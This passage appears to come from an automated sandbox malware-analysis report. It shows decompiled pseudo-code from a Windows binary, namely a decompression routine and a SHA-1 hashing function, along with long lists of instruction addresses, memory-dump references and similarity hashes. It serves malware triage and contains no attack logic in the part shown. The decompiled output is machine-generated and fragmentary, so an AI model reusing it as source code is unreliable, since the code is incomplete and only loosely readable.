								_t653 = _t616 >> _t608 - _t352;
								_t611 = ( *(_t653 + _t654 + 0xb8) & 0x000000ff) +  *(_t667 + 4);
								 *_t667 =  *_t667 + (_t611 >> 3);
								_t347 = _t654 + 4;
								 *(_t347 + 4) = _t611 & 0x00000007;
								_t619 =  *(_t654 + 0x4b8 + _t653 * 2) & 0x0000ffff;
								goto L31;
							}
							__eflags = _t507 -  *(_t663 + 0x7c);
							if(_t507 ==  *(_t663 + 0x7c)) {
								goto L21;
							}
							E009F47DA(_t663);
							__eflags =  *((intOrPtr*)(_t663 + 0x4c5c)) -  *((intOrPtr*)(_t663 + 0x4c4c));
							if(__eflags > 0) {
								L152:
								_t418 = 0;
								goto L101;
							}
							if(__eflags < 0) {
								goto L21;
							}
							__eflags =  *((intOrPtr*)(_t663 + 0x4c58)) -  *((intOrPtr*)(_t663 + 0x4c48));
							if( *((intOrPtr*)(_t663 + 0x4c58)) >  *((intOrPtr*)(_t663 + 0x4c48))) {
								goto L152;
							}
							goto L21;
						}
					}
				}
				 *((char*)(_t654 + 0x2c)) = 1;
				_push(_t654 + 0x30);
				_push(_t654 + 0x18);
				_push(_t654 + 4);
				if(E009F397F(__ecx) != 0) {
					goto L3;
				}
				goto L2;
			}


















































































































































                            0x009f6ce0
                            0x009f6ce4
                            0x009f6cea
                            0x009f6d13
                            0x009f6d16
                            0x009f6d1b
                            0x009f6d1e
                            0x009f6d05
                            0x009f6d05
                            0x00000000
                            0x009f6d20
                            0x009f6d2b
                            0x009f6d2e
                            0x009f6d31
                            0x009f6d35
                            0x009f6d39
                            0x009f6d3d
                            0x009f6d3f
                            0x009f6d41
                            0x009f6d41
                            0x009f6d45
                            0x009f6d52
                            0x009f6d52
                            0x009f6d58
                            0x009f6d5b
                            0x009f6d5d
                            0x009f6d61
                            0x00000000
                            0x00000000
                            0x009f6d63
                            0x009f6d63
                            0x009f6d65
                            0x009f72f0
                            0x009f72f0
                            0x009f72f2
                            0x00000000
                            0x009f72f3
                            0x009f6d6b
                            0x009f6d79
                            0x009f6d79
                            0x009f6d7b
                            0x009f6d8a
                            0x009f6d8a
                            0x009f6d90
                            0x009f763f
                            0x009f763f
                            0x00000000
                            0x009f763f
                            0x00000000
                            0x009f6d90
                            0x009f6d7d
                            0x009f6d84
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f6d84
                            0x009f6d70
                            0x009f6d73
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f6d96
                            0x009f6d96
                            0x009f6da3
                            0x009f6da8
                            0x009f6ddc
                            0x009f6ddc
                            0x009f6de1
                            0x009f6de8
                            0x009f6dee
                            0x009f6df4
                            0x009f6df8
                            0x009f6e32
                            0x009f6e33
                            0x009f6e34
                            0x009f6e36
                            0x009f6e4f
                            0x009f6e52
                            0x009f6e59
                            0x009f6e5c
                            0x009f6e5f
                            0x009f6e68
                            0x009f6e71
                            0x009f6e73
                            0x009f6e76
                            0x009f6e78
                            0x009f6e78
                            0x009f6e7a
                            0x009f6e82
                            0x009f6e85
                            0x009f6e8a
                            0x009f6e8c
                            0x009f6ea5
                            0x009f6eab
                            0x009f72c7
                            0x009f72c9
                            0x009f72fc
                            0x009f7302
                            0x009f741e
                            0x009f741e
                            0x009f7427
                            0x009f742a
                            0x009f742c
                            0x009f7430
                            0x009f743f
                            0x009f743f
                            0x009f7442
                            0x009f7447
                            0x009f744e
                            0x009f7454
                            0x009f745a
                            0x009f7461
                            0x009f748f
                            0x009f7490
                            0x009f7491
                            0x009f7493
                            0x009f74af
                            0x009f74b2
                            0x009f74b9
                            0x009f74bc
                            0x009f74bf
                            0x009f74cb
                            0x009f74d7
                            0x009f74d9
                            0x009f74df
                            0x009f74e1
                            0x009f74e1
                            0x009f74e3
                            0x009f74eb
                            0x009f74eb
                            0x009f74ee
                            0x009f74f1
                            0x009f7502
                            0x009f7505
                            0x009f7505
                            0x009f74f3
                            0x009f74f3
                            0x009f74f3
                            0x009f7507
                            0x009f750a
                            0x009f750c
                            0x009f7511
                            0x009f7518
                            0x009f7520
                            0x009f7522
                            0x009f7529
                            0x009f752c
                            0x009f752c
                            0x009f752f
                            0x009f752f
                            0x009f7532
                            0x009f753d
                            0x009f7541
                            0x009f7546
                            0x009f7549
                            0x009f754b
                            0x009f75ff
                            0x009f75ff
                            0x009f7602
                            0x009f7604
                            0x00000000
                            0x00000000
                            0x009f760a
                            0x009f7610
                            0x009f7616
                            0x009f761b
                            0x009f761f
                            0x009f7625
                            0x009f762e
                            0x009f7631
                            0x009f7631
                            0x009f7631
                            0x009f7636
                            0x009f7636
                            0x009f6e9d
                            0x009f6e9d
                            0x00000000
                            0x009f7551
                            0x009f7551
                            0x009f7553
                            0x00000000
                            0x00000000
                            0x009f7559
                            0x009f755f
                            0x009f7561
                            0x009f7567
                            0x009f756b
                            0x009f756e
                            0x009f7572
                            0x009f75c4
                            0x009f75c7
                            0x009f71fb
                            0x009f71fb
                            0x009f71fe
                            0x009f7200
                            0x009f6d4a
                            0x009f6d4e
                            0x009f6d4e
                            0x009f6d52
                            0x009f6d52
                            0x009f6d58
                            0x009f6d5b
                            0x009f6d5d
                            0x009f6d61
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f6d61
                            0x009f6d52
                            0x009f7209
                            0x009f720b
                            0x009f720e
                            0x009f7211
                            0x00000000
                            0x00000000
                            0x009f721a
                            0x009f721d
                            0x009f7220
                            0x009f7223
                            0x00000000
                            0x00000000
                            0x009f722c
                            0x009f722f
                            0x009f7232
                            0x009f7235
                            0x00000000
                            0x00000000
                            0x009f723e
                            0x009f7241
                            0x009f7244
                            0x009f7247
                            0x00000000
                            0x00000000
                            0x009f7250
                            0x009f7253
                            0x009f7256
                            0x009f7259
                            0x00000000
                            0x00000000
                            0x009f7262
                            0x009f7265
                            0x009f7269
                            0x009f726c
                            0x009f726f
                            0x009f7278
                            0x009f727b
                            0x009f727b
                            0x00000000
                            0x009f726f
                            0x009f75cf
                            0x009f75cf
                            0x009f75d2
                            0x009f75d6
                            0x009f75d8
                            0x009f75dc
                            0x009f75e1
                            0x009f75e5
                            0x009f75e8
                            0x009f75eb
                            0x009f75ee
                            0x009f75f1
                            0x009f75f5
                            0x009f75f5
                            0x009f75f5
                            0x009f71f7
                            0x009f71f7
                            0x00000000
                            0x009f71f7
                            0x009f7574
                            0x009f7577
                            0x00000000
                            0x00000000
                            0x009f757f
                            0x009f757f
                            0x009f7582
                            0x009f7585
                            0x009f7588
                            0x009f758d
                            0x009f7593
                            0x009f7599
                            0x009f759f
                            0x009f75a5
                            0x009f75ab
                            0x009f75ae
                            0x009f75b1
                            0x009f75b4
                            0x009f75b7
                            0x009f75ba
                            0x009f75ba
                            0x009f75ba
                            0x00000000
                            0x009f75bf
                            0x009f754b
                            0x009f749b
                            0x009f749e
                            0x009f749e
                            0x009f74a0
                            0x00000000
                            0x00000000
                            0x009f74a2
                            0x009f74a3
                            0x009f74a6
                            0x009f74a9
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f74ab
                            0x009f74ad
                            0x00000000
                            0x009f74ad
                            0x009f7465
                            0x009f7468
                            0x009f7472
                            0x009f747a
                            0x009f7480
                            0x009f7483
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f7432
                            0x009f7432
                            0x009f7435
                            0x009f7437
                            0x009f743a
                            0x009f743a
                            0x009f743a
                            0x00000000
                            0x009f7432
                            0x009f7308
                            0x009f730b
                            0x009f730f
                            0x009f7311
                            0x009f6e27
                            0x009f6e27
                            0x00000000
                            0x009f6e27
                            0x009f7317
                            0x009f731a
                            0x009f731f
                            0x009f7321
                            0x009f732b
                            0x009f7330
                            0x009f7332
                            0x009f73e2
                            0x009f73e2
                            0x009f73e5
                            0x009f73e7
                            0x00000000
                            0x00000000
                            0x009f73ed
                            0x009f73f3
                            0x009f73f9
                            0x009f73fe
                            0x009f7402
                            0x009f7408
                            0x009f7411
                            0x009f7414
                            0x009f7414
                            0x009f7414
                            0x00000000
                            0x009f7419
                            0x009f7338
                            0x009f733a
                            0x00000000
                            0x00000000
                            0x009f7340
                            0x009f7346
                            0x009f7348
                            0x009f734e
                            0x009f7352
                            0x009f7355
                            0x009f7359
                            0x009f73ab
                            0x009f73ae
                            0x00000000
                            0x00000000
                            0x009f73b6
                            0x009f73b6
                            0x009f73b9
                            0x009f73bb
                            0x009f73bf
                            0x009f73c4
                            0x009f73c8
                            0x009f73cb
                            0x009f73ce
                            0x009f73d1
                            0x009f73d4
                            0x009f73d8
                            0x009f73d8
                            0x009f73d8
                            0x00000000
                            0x009f73dd
                            0x009f735b
                            0x009f735e
                            0x00000000
                            0x00000000
                            0x009f7366
                            0x009f7366
                            0x009f7369
                            0x009f736c
                            0x009f736f
                            0x009f7374
                            0x009f737a
                            0x009f7380
                            0x009f7386
                            0x009f738c
                            0x009f7392
                            0x009f7395
                            0x009f7398
                            0x009f739b
                            0x009f739e
                            0x009f73a1
                            0x009f73a1
                            0x009f73a1
                            0x00000000
                            0x009f73a6
                            0x009f72cf
                            0x009f72d3
                            0x009f72d8
                            0x009f72da
                            0x00000000
                            0x00000000
                            0x009f72e3
                            0x009f72e8
                            0x009f72ea
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f72ea
                            0x009f6eb1
                            0x009f6eb7
                            0x009f6eba
                            0x009f6ecb
                            0x009f6ece
                            0x009f6ece
                            0x009f6ebc
                            0x009f6ebc
                            0x009f6ebc
                            0x009f6ed0
                            0x009f6ed3
                            0x009f6ed5
                            0x009f6eff
                            0x009f6ed7
                            0x009f6ed9
                            0x009f6ee0
                            0x009f6ee8
                            0x009f6eea
                            0x009f6eec
                            0x009f6ef4
                            0x009f6efa
                            0x009f6efa
                            0x009f6f04
                            0x009f6f0b
                            0x009f6f11
                            0x009f6f17
                            0x009f6f1e
                            0x009f6f4c
                            0x009f6f4d
                            0x009f6f4e
                            0x009f6f50
                            0x009f6f6c
                            0x009f6f6f
                            0x009f6f76
                            0x009f6f79
                            0x009f6f7c
                            0x009f6f88
                            0x009f6f94
                            0x009f6f96
                            0x009f6f9c
                            0x009f6f9e
                            0x009f6f9e
                            0x009f6fa0
                            0x00000000
                            0x009f6fa0
                            0x009f6f58
                            0x009f6f5b
                            0x009f6f5b
                            0x009f6f5d
                            0x00000000
                            0x00000000
                            0x009f6f5f
                            0x009f6f60
                            0x009f6f63
                            0x009f6f66
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f6f68
                            0x009f6f6a
                            0x00000000
                            0x009f6f20
                            0x009f6f22
                            0x009f6f25
                            0x009f6f2f
                            0x009f6f37
                            0x009f6f3d
                            0x009f6f40
                            0x009f6fa8
                            0x009f6fa8
                            0x009f6fab
                            0x009f6fae
                            0x009f6fbe
                            0x009f6fc1
                            0x009f6fc1
                            0x009f6fb0
                            0x009f6fb0
                            0x009f6fb0
                            0x009f6fc3
                            0x009f6fc7
                            0x009f6fca
                            0x009f6fce
                            0x009f6fd0
                            0x009f6fd4
                            0x009f6fd6
                            0x009f7107
                            0x009f7107
                            0x009f710d
                            0x009f710f
                            0x009f7110
                            0x009f7116
                            0x009f7118
                            0x009f7119
                            0x009f711f
                            0x009f7121
                            0x009f7121
                            0x009f7121
                            0x009f711f
                            0x009f7116
                            0x009f7125
                            0x009f712b
                            0x009f7131
                            0x009f7134
                            0x009f7137
                            0x009f7142
                            0x009f7144
                            0x009f7149
                            0x009f714c
                            0x009f7150
                            0x009f7152
                            0x009f7283
                            0x009f7283
                            0x009f7287
                            0x009f728a
                            0x009f728c
                            0x00000000
                            0x00000000
                            0x009f7292
                            0x009f7298
                            0x009f729c
                            0x009f72a2
                            0x009f72a7
                            0x009f72ab
                            0x009f72b1
                            0x009f72ba
                            0x009f72bd
                            0x009f72bd
                            0x009f72bd
                            0x00000000
                            0x009f7158
                            0x009f7158
                            0x009f715a
                            0x00000000
                            0x00000000
                            0x009f7160
                            0x009f7166
                            0x009f7169
                            0x009f716f
                            0x009f7173
                            0x009f7176
                            0x009f717a
                            0x009f71c5
                            0x009f71c8
                            0x00000000
                            0x00000000
                            0x009f71cc
                            0x009f71cc
                            0x009f71cf
                            0x009f71d3
                            0x009f71d5
                            0x009f71d9
                            0x009f71de
                            0x009f71e2
                            0x009f71e5
                            0x009f71e8
                            0x009f71eb
                            0x009f71ee
                            0x009f71f2
                            0x009f71f2
                            0x009f71f2
                            0x00000000
                            0x009f71d5
                            0x009f717c
                            0x009f717f
                            0x00000000
                            0x00000000
                            0x009f7183
                            0x009f7183
                            0x009f7186
                            0x009f7189
                            0x009f718c
                            0x009f7191
                            0x009f7197
                            0x009f719d
                            0x009f71a3
                            0x009f71a9
                            0x009f71af
                            0x009f71b2
                            0x009f71b5
                            0x009f71b8
                            0x009f71bb
                            0x009f71be
                            0x009f71be
                            0x009f71be
                            0x00000000
                            0x009f71c3
                            0x009f6fdc
                            0x009f6fdc
                            0x009f6fdf
                            0x009f70da
                            0x009f70e3
                            0x009f70ed
                            0x009f70f1
                            0x009f70fa
                            0x009f70fd
                            0x009f70fd
                            0x009f7100
                            0x009f7103
                            0x009f7103
                            0x00000000
                            0x009f7103
                            0x009f6fe5
                            0x009f701b
                            0x009f6fe7
                            0x009f6fea
                            0x009f6fef
                            0x009f6ff7
                            0x009f6fff
                            0x009f7002
                            0x009f700a
                            0x009f7011
                            0x009f7016
                            0x009f7016
                            0x009f7020
                            0x009f7027
                            0x009f702d
                            0x009f7033
                            0x009f703a
                            0x009f7068
                            0x009f7069
                            0x009f706a
                            0x009f706e
                            0x009f7070
                            0x009f708e
                            0x009f7091
                            0x009f709d
                            0x009f70a0
                            0x009f70a4
                            0x009f70a9
                            0x009f70bc
                            0x009f70be
                            0x009f70c4
                            0x009f70c6
                            0x009f70c6
                            0x009f70c8
                            0x00000000
                            0x009f70c8
                            0x009f7078
                            0x009f707b
                            0x009f707b
                            0x009f707d
                            0x00000000
                            0x00000000
                            0x009f707f
                            0x009f7080
                            0x009f7083
                            0x009f7086
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f7088
                            0x009f708a
                            0x00000000
                            0x009f703c
                            0x009f703e
                            0x009f7041
                            0x009f704b
                            0x009f7053
                            0x009f7059
                            0x009f705c
                            0x009f70d0
                            0x009f70d3
                            0x00000000
                            0x009f70d3
                            0x009f703a
                            0x009f6fd6
                            0x009f6f1e
                            0x009f6e97
                            0x009f6e9a
                            0x009f6e9a
                            0x009f6e9a
                            0x00000000
                            0x009f6e9a
                            0x009f6e3b
                            0x009f6e3e
                            0x009f6e3e
                            0x009f6e40
                            0x00000000
                            0x00000000
                            0x009f6e42
                            0x009f6e43
                            0x009f6e46
                            0x009f6e49
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f6e4b
                            0x009f6e4d
                            0x00000000
                            0x009f6e4d
                            0x009f6dfc
                            0x009f6dff
                            0x009f6e09
                            0x009f6e11
                            0x009f6e17
                            0x009f6e1a
                            0x009f6e1d
                            0x00000000
                            0x009f6e1d
                            0x009f6daa
                            0x009f6dad
                            0x00000000
                            0x00000000
                            0x009f6db1
                            0x009f6dbc
                            0x009f6dc2
                            0x009f764b
                            0x009f764b
                            0x00000000
                            0x009f764b
                            0x009f6dc8
                            0x00000000
                            0x00000000
                            0x009f6dd0
                            0x009f6dd6
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f6dd6
                            0x009f6d52
                            0x009f6d1e
                            0x009f6cef
                            0x009f6cf3
                            0x009f6cf7
                            0x009f6cfb
                            0x009f6d03
                            0x00000000
                            0x00000000
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 807f214746869600fdd18866b4149cd4aafbd92bc6957c1dafb80c3f5aedf6e6
                            • Instruction ID: eb91a98c66b244fc1a9ad2340719636fa2222127b0831299d32963a87733105c
                            • Opcode Fuzzy Hash: 807f214746869600fdd18866b4149cd4aafbd92bc6957c1dafb80c3f5aedf6e6
                            • Instruction Fuzzy Hash: 9B62257160878A9FC719CF68C8806B9FBE1BF45304F148A6DEAA68B742D734F955CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009EE973, Relevance: .7, Instructions: 694COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 70%
                            			E009EE973(signed int* _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				signed int _v24;
				signed int _v28;
				signed int _t429;
				intOrPtr _t431;
				intOrPtr _t436;
				void* _t441;
				intOrPtr _t443;
				signed int _t446;
				void* _t448;
				signed int _t454;
				signed int _t460;
				signed int _t466;
				signed int _t474;
				signed int _t482;
				signed int _t489;
				signed int _t512;
				signed int _t519;
				signed int _t526;
				signed int _t546;
				signed int _t555;
				signed int _t564;
				signed int* _t592;
				signed int _t593;
				signed int _t595;
				signed int _t596;
				signed int* _t597;
				signed int _t598;
				signed int _t599;
				signed int _t601;
				signed int _t603;
				signed int _t604;
				signed int* _t605;
				signed int _t606;
				signed int* _t670;
				signed int* _t741;
				signed int _t752;
				signed int _t769;
				signed int _t773;
				signed int _t777;
				signed int _t781;
				signed int _t782;
				signed int _t786;
				signed int _t787;
				signed int _t791;
				signed int _t796;
				signed int _t800;
				signed int _t804;
				signed int _t806;
				signed int _t809;
				signed int _t810;
				signed int* _t811;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t820;
				signed int _t821;
				signed int _t825;
				signed int _t830;
				signed int _t834;
				signed int _t838;
				signed int* _t839;
				signed int _t841;
				signed int _t842;
				signed int _t844;
				signed int _t845;
				signed int _t847;
				signed int* _t848;
				signed int _t851;
				signed int* _t854;
				signed int _t855;
				signed int _t857;
				signed int _t858;
				signed int _t862;
				signed int _t863;
				signed int _t867;
				signed int _t871;
				signed int _t875;
				signed int _t879;
				signed int _t880;
				signed int* _t881;
				signed int _t882;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t890;
				signed int _t891;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				signed int _t897;
				signed int* _t898;
				signed int _t899;
				signed int _t901;
				signed int _t902;
				signed int _t904;
				signed int _t905;

				_t906 =  &_v28;
				if(_a16 == 0) {
					_t839 = _a8;
					_v20 = _t839;
					E009FEA80(_t839, _a12, 0x40);
					_t906 =  &(( &_v28)[3]);
				} else {
					_t839 = _a12;
					_v20 = _t839;
				}
				_t848 = _a4;
				_t593 =  *_t848;
				_t886 = _t848[1];
				_a12 = _t848[2];
				_a16 = _t848[3];
				_v24 = 0;
				_t429 = E00A05604( *_t839);
				asm("rol edx, 0x5");
				 *_t839 = _t429;
				_t851 = _t848[4] + 0x5a827999 + ((_a16 ^ _a12) & _t886 ^ _a16) + _t593 + _t429;
				_t430 = _t839;
				asm("ror ebp, 0x2");
				_v16 = _t839;
				_a8 =  &(_t839[3]);
				do {
					_t431 = E00A05604(_t430[1]);
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v16 + 4)) = _t431;
					asm("ror ebx, 0x2");
					_a16 = _a16 + 0x5a827999 + ((_a12 ^ _t886) & _t593 ^ _a12) + _t851 + _t431;
					_t436 = E00A05604( *((intOrPtr*)(_a8 - 4)));
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_a8 - 4)) = _t436;
					asm("ror esi, 0x2");
					_a12 = _a12 + 0x5a827999 + ((_t886 ^ _t593) & _t851 ^ _t886) + _a16 + _t436;
					_t441 = E00A05604( *_a8);
					asm("rol edx, 0x5");
					 *_a8 = _t441;
					asm("ror dword [esp+0x48], 0x2");
					_t886 = _t886 + ((_t851 ^ _t593) & _a16 ^ _t593) + _a12 + 0x5a827999 + _t441;
					_t443 = E00A05604( *((intOrPtr*)(_a8 + 4)));
					_a8 = _a8 + 0x14;
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_a8 + 4)) = _t443;
					_t446 = _v24 + 5;
					asm("ror dword [esp+0x48], 0x2");
					_v24 = _t446;
					_t593 = _t593 + ((_t851 ^ _a16) & _a12 ^ _t851) + _t886 + _t443 + 0x5a827999;
					_v16 =  &(_t839[_t446]);
					_t448 = E00A05604(_t839[_t446]);
					_t906 =  &(_t906[5]);
					asm("rol edx, 0x5");
					 *_v16 = _t448;
					_t430 = _v16;
					asm("ror ebp, 0x2");
					_t851 = _t851 + 0x5a827999 + ((_a16 ^ _a12) & _t886 ^ _a16) + _t593 + _t448;
				} while (_v24 != 0xf);
				_t769 = _t839[0xd] ^ _t839[8] ^ _t839[2] ^  *_t839;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				 *_t839 = _t769;
				_t454 = ((_a12 ^ _t886) & _t593 ^ _a12) + _t851 + _t769 + _a16 + 0x5a827999;
				_t773 = _t839[0xe] ^ _t839[9] ^ _t839[3] ^ _t839[1];
				_a16 = _t454;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t839[1] = _t773;
				_t777 = _t839[0xf] ^ _t839[0xa] ^ _t839[4] ^ _t839[2];
				_t460 = ((_t886 ^ _t593) & _t851 ^ _t886) + _t454 + _t773 + _a12 + 0x5a827999;
				asm("ror esi, 0x2");
				_a8 = _t460;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				_t839[2] = _t777;
				_t466 = ((_t851 ^ _t593) & _a16 ^ _t593) + _t460 + 0x5a827999 + _t777 + _t886;
				_t887 = _a16;
				_t781 = _t839[0xb] ^ _t839[5] ^ _t839[3] ^  *_t839;
				_v28 = _t466;
				asm("ror ebp, 0x2");
				_a16 = _t887;
				_t888 = _a8;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				_t839[3] = _t781;
				asm("ror ebp, 0x2");
				_t782 = 0x11;
				_a12 = ((_t851 ^ _t887) & _t888 ^ _t851) + 0x5a827999 + _t466 + _t781 + _t593;
				_a8 = _t888;
				_v16 = _t782;
				do {
					_t89 = _t782 + 5; // 0x16
					_t474 = _t89;
					_v8 = _t474;
					_t91 = _t782 - 5; // 0xc
					_t92 = _t782 + 3; // 0x14
					_t890 = _t92 & 0x0000000f;
					_t595 = _t474 & 0x0000000f;
					_v12 = _t890;
					_t786 = _t839[_t91 & 0x0000000f] ^ _t839[_t782 & 0x0000000f] ^ _t839[_t595] ^ _t839[_t890];
					asm("rol edx, 1");
					_t839[_t890] = _t786;
					_t891 = _v28;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v28 = _t891;
					_t482 = _v16;
					_v24 = _t851 + (_a16 ^ _a8 ^ _t891) + 0x6ed9eba1 + _a12 + _t786;
					_t854 = _v20;
					_t787 = 0xf;
					_t841 = _t482 + 0x00000006 & _t787;
					_t893 = _t482 + 0x00000004 & _t787;
					_t791 =  *(_t854 + (_t482 - 0x00000004 & _t787) * 4) ^  *(_t854 + (_t482 + 0x00000001 & _t787) * 4) ^  *(_t854 + _t893 * 4) ^  *(_t854 + _t841 * 4);
					asm("rol edx, 1");
					 *(_t854 + _t893 * 4) = _t791;
					_t855 = _a12;
					asm("rol ecx, 0x5");
					asm("ror esi, 0x2");
					_a12 = _t855;
					_t489 = _v16;
					_a16 = _a16 + 0x6ed9eba1 + (_a8 ^ _v28 ^ _t855) + _v24 + _t791;
					_t857 = _t489 + 0x00000007 & 0x0000000f;
					_t670 = _v20;
					_t796 = _v20[_t489 - 0x00000003 & 0x0000000f] ^  *(_t670 + (_t489 + 0x00000002 & 0x0000000f) * 4) ^  *(_t670 + _t595 * 4) ^  *(_t670 + _t857 * 4);
					asm("rol edx, 1");
					 *(_t670 + _t595 * 4) = _t796;
					_t596 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t596;
					_t597 = _v20;
					_a8 = _a8 + 0x6ed9eba1 + (_t596 ^ _v28 ^ _a12) + _a16 + _t796;
					asm("rol ecx, 0x5");
					_t800 =  *(_t597 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t597 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t597 + _t841 * 4) ^  *(_t597 + _v12 * 4);
					asm("rol edx, 1");
					 *(_t597 + _t841 * 4) = _t800;
					_t598 = _a16;
					_t839 = _v20;
					asm("ror ebx, 0x2");
					_a16 = _t598;
					_v28 = _v28 + 0x6ed9eba1 + (_v24 ^ _t598 ^ _a12) + _a8 + _t800;
					_t804 = _t839[_v16 - 0x00000007 & 0x0000000f] ^ _t839[_v16 - 0x00000001 & 0x0000000f] ^ _t839[_t893] ^ _t839[_t857];
					_t894 = _a8;
					asm("rol edx, 1");
					_t839[_t857] = _t804;
					_t851 = _v24;
					asm("rol ecx, 0x5");
					_t782 = _v8;
					asm("ror ebp, 0x2");
					_a8 = _t894;
					_a12 = _a12 + 0x6ed9eba1 + (_t851 ^ _t598 ^ _t894) + _v28 + _t804;
					_v16 = _t782;
				} while (_t782 + 3 <= 0x23);
				_t858 = 0x25;
				_v16 = _t858;
				while(1) {
					_t199 = _t858 + 5; // 0x2a
					_t512 = _t199;
					_t200 = _t858 - 5; // 0x20
					_v4 = _t512;
					_t202 = _t858 + 3; // 0x28
					_t806 = _t202 & 0x0000000f;
					_v8 = _t806;
					_t896 = _t512 & 0x0000000f;
					_t862 = _t839[_t200 & 0x0000000f] ^ _t839[_t858 & 0x0000000f] ^ _t839[_t806] ^ _t839[_t896];
					asm("rol esi, 1");
					_t599 = _v28;
					_t839[_t806] = _t862;
					asm("rol edx, 0x5");
					asm("ror ebx, 0x2");
					_t863 = 0xf;
					_v28 = _t599;
					_v24 = _a12 - 0x70e44324 + ((_a8 | _v28) & _t598 | _a8 & _t599) + _t862 + _v24;
					_t519 = _v16;
					_t601 = _t519 + 0x00000006 & _t863;
					_t809 = _t519 + 0x00000004 & _t863;
					_v12 = _t809;
					_t867 = _t839[_t519 - 0x00000004 & _t863] ^ _t839[_t519 + 0x00000001 & _t863] ^ _t839[_t809] ^ _t839[_t601];
					asm("rol esi, 1");
					_t839[_t809] = _t867;
					_t842 = _a12;
					_t810 = _v24;
					asm("rol edx, 0x5");
					asm("ror edi, 0x2");
					_a12 = _t842;
					_t243 = _t810 - 0x70e44324; // -1894007573
					_t811 = _v20;
					_a16 = _t243 + ((_v28 | _t842) & _a8 | _v28 & _t842) + _t867 + _a16;
					_t526 = _v16;
					_t844 = _t526 + 0x00000007 & 0x0000000f;
					_t871 =  *(_t811 + (_t526 - 0x00000003 & 0x0000000f) * 4) ^  *(_t811 + (_t526 + 0x00000002 & 0x0000000f) * 4) ^  *(_t811 + _t844 * 4) ^  *(_t811 + _t896 * 4);
					asm("rol esi, 1");
					 *(_t811 + _t896 * 4) = _t871;
					_t897 = _v24;
					asm("rol edx, 0x5");
					asm("ror ebp, 0x2");
					_t814 = _a16 + 0x8f1bbcdc + ((_t897 | _a12) & _v28 | _t897 & _a12) + _t871 + _a8;
					_v24 = _t897;
					_t898 = _v20;
					_a8 = _t814;
					asm("rol edx, 0x5");
					_t875 =  *(_t898 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t898 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t898 + _v8 * 4) ^  *(_t898 + _t601 * 4);
					asm("rol esi, 1");
					 *(_t898 + _t601 * 4) = _t875;
					_t598 = _a16;
					asm("ror ebx, 0x2");
					_a16 = _t598;
					_t815 = _t814 + ((_v24 | _t598) & _a12 | _v24 & _t598) + 0x8f1bbcdc + _t875 + _v28;
					_v28 = _t815;
					asm("rol edx, 0x5");
					_t879 =  *(_t898 + (_v16 - 0x00000007 & 0x0000000f) * 4) ^  *(_t898 + (_v16 - 0x00000001 & 0x0000000f) * 4) ^  *(_t898 + _t844 * 4) ^  *(_t898 + _v12 * 4);
					asm("rol esi, 1");
					 *(_t898 + _t844 * 4) = _t879;
					_t899 = _a8;
					_t845 = _v24;
					asm("ror ebp, 0x2");
					_a8 = _t899;
					_t858 = _v4;
					_a12 = _t815 - 0x70e44324 + ((_t598 | _t899) & _t845 | _t598 & _t899) + _t879 + _a12;
					_v16 = _t858;
					if(_t858 + 3 > 0x37) {
						break;
					}
					_t839 = _v20;
				}
				_t816 = 0x39;
				_v16 = _t816;
				do {
					_t310 = _t816 + 5; // 0x3e
					_t546 = _t310;
					_v8 = _t546;
					_t312 = _t816 + 3; // 0x3c
					_t313 = _t816 - 5; // 0x34
					_t880 = 0xf;
					_t901 = _t312 & _t880;
					_t603 = _t546 & _t880;
					_t881 = _v20;
					_v4 = _t901;
					_t820 =  *(_t881 + (_t313 & _t880) * 4) ^  *(_t881 + (_t816 & _t880) * 4) ^  *(_t881 + _t603 * 4) ^  *(_t881 + _t901 * 4);
					asm("rol edx, 1");
					 *(_t881 + _t901 * 4) = _t820;
					_t902 = _v28;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v28 = _t902;
					_v24 = (_a16 ^ _a8 ^ _t902) + _t820 + _t845 + _a12 + 0xca62c1d6;
					_t555 = _v16;
					_t821 = 0xf;
					_t847 = _t555 + 0x00000006 & _t821;
					_t904 = _t555 + 0x00000004 & _t821;
